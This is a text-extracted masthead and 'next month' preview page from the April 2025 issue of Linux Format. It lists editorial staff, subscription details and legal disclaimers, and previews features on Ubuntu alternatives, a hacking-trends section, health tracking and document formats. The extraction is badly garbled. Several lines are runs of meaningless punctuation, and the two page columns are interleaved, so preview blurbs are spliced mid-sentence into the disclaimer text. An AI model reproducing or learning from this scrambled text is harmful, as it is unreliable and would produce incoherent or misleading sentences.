,*&+1&,+,#16-"0,#/&1//6 ,*-)"5&16o 1%1}0*,/"201v)&("o

DON’T LEAVE THINGS TO CHANCE Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 97

 NEXT MONTH

The #1 open source mag

Future Publishing Limited, Quay House, The Ambury, Bath, BA1 1UA

LXF32s7ale
Email [email protected]
EDITORIAL
Editor-in-chief Neil Mohr

will be on
Art editor Fraser McDermott
Production editor Katharine Davies

Tuesday
Content director Marc Chacksfield
Group art director Warren Brown

1st April
Editorial contributors
Mike Bedford, Jonni Bidwell, David Bolton, Neil Bothwick, Stuart Burns,
Nate Drake, Kseniya Fedoruk, Tam Hanna, Brandon Hill, Nick Peers,
2025 "0,2+!"/n& %")""!n6+(%/*n%0%+(%/*n
3"6&+!"/n ,0%2,)"+0
Cover illustration Magictorch.com
0-"//6&&01/!"*/(,#1%"0-"//6& ,2+!1&,+o
Tux credit: Larry Ewing ([email protected]).
Content production Adequate Media Limited
ADVERTISING
Commercial sales director Clare Dove
[email protected]
Advertising director Lara Jaggon
[email protected]
Account director Andrew Tilbury
[email protected]
INTERNATIONAL LICENSING
Head of print licensing  %")%4
Linux Format is available for licensing and syndication.
To find our more contact us at [email protected]
or view our content at www.futurecontenthub.com
NEW SUBSCRIPTIONS & PAST ISSUES
Web www.magazinesdirect.com
EXISTING SUBSCRIPTIONS
Web www.mymagazine.co.uk
Subscription delays: Please allow up to seven days before
contacting us about a late delivery to [email protected]

LINUX ON
MANAGE YOUR SUBSCRIPTION ONLINE WITH MYMAGAZINE
Visit www.mymagazine.co.uk/FAQ to view frequently asked questions
or log in at www.mymagazine.co.uk
CIRCULATION
Newstrade & retail category director Ben Oakden
PRODUCTION AND DISTRIBUTION
Group head of production Mark Constance
Production manager Nola Cokely

THE MOVE
Senior ad production manager Jo Crosby
Digital editions manager Jason Hudson
THE MANAGEMENT
Managing director technology group Paul Newman
Global head of design,!+"6&3"
Commercial finance director Tania Brunning
Printed by William Gibbons & Sons
Distributed by Marketforce UK
9:9v9<9"01,2/+""// "n,+!,+:> owww.marketforce.co.uk
For enquiries email: [email protected]

How do you take Linux with you? In your pocket? On Order and access past issues: If you are an active subscriber, you have instant access to past issues through your iOS or
Android device/s. Your digital magazine entitlement is available at no additional cost and no further action is required.
Pocketmags library may not have access to the full archive of digital past issues. You will only be able to access the digital

your wrist? In a bag? We show you all the options!

back issues as long as you are an active subscriber.
To purchase single past issues (print format only): Visit www.magazinesdirect.com (click on Single Issues tab)
or email [email protected]. Magazinesdirect.com is owned and operated by Future Publishing Limited.
BAR rates for Linux Format: £84.37 for UK, €171 for Europe, $194 for USA, £149 for rest of world.
Linux® is the registered trademark of Linus Torvalds in the US and other countries. GNU/Linux is abbreviated to Linux
throughout for brevity. Where applicable, code printed in this magazine is licensed under the GNU GPL v2 or later. See

Dump Ubuntu!
www.gnu.org/copyleft/gpl.html. All copyrights and trademarks are recognised and respected.
Disclaimer: All contents © 2025 Future Publishing Limited or published under licence. All rights reserved. No part of this
magazine may be used, stored, transmitted or reproduced in any way without the prior written permission of the publisher.
212/"2)&0%&+$&*&1"!ƒ ,*-+6+2*"/:88@@@=„&0/"$&01"/"!&++$)+!+!)"0o"$&01"/"!,##& "p26
House, The Ambury, Bath BA1 1UA. All information contained in this publication is for information only and is, as far as we

We stack up the best Ubuntu alternatives so you can run are aware, correct at the time of going to press. Future Publishing Limited cannot accept any responsibility for errors or
inaccuracies in such information. You are advised to contact manufacturers and retailers directly with regard to the price of
products/services referred to in this publication. Apps and websites mentioned in this publication are not under our

Ubuntu without having to deal with Ubuntu! control. We are not responsible for their contents or any other changes or updates to them. This magazine is fully
independent and not affiliated in any way with the companies mentioned herein.
If you submit material to us, you warrant that you own the material and/or have the necessary rights/permissions
1,02--)61%"*1"/&)+!6,221,*1& ))6$/+1 212/"2)&0%&+$&*&1"!+!&10)& "+0""0)& "+ "1,-2)&0%6,2/
submission in whole or in part in any/all issues and/or editions of publications, in any format published worldwide and on

Hacking Academy
00, &1"!4"0&1"0n0, &)*"!& %++")0+!00, &1"!-/,!2 10o+6*1"/&)6,202*&1&00"+116,2/,4+/&0(+!n
although every care is taken, neither Future nor its employees, agents, subcontractors or licensees shall be liable for loss or
damage. We assume all unsolicited material is for publication unless otherwise stated, and reserve the right to edit, amend
and adapt all submissions. All contents in this magazine are used at your own risk. We accept no liability for any loss of data
or damage to your systems, peripherals or software through the use of any guide. Notes: This issue was brought to you

We start a new section following hacking trends, tools and

with an inner ear infection.
We are committed to only using magazine paper derived from responsibly managed, certified forestry and chlorine-free
manufacture. The paper in this magazine was sourced and produced from sustainable managed forests, conforming to

tutorials, so you can stay up to date with attack vectors.

strict environmental and socioeconomic standards.

-"+Y1+"00 Future is an award-winning international media group and

Use open hardware and open source software to track and leading digital business. We reach more than 57 million
international consumers a month and create world-class
content and advertising solutions for passionate
manage your health with custom monitor solutions. consumers online, on tablet & smartphone and in print.

Open Document Format

CREDIT: Magictorch

We delve into the exciting world of document formats,

%,4,-"+/2)"020&+"00n+!21,*1&+$3&1%"1"/*&+)o
Content of future issues subject to change. Yes, we are on holiday!

98 LXF326 April 2025

9000 9001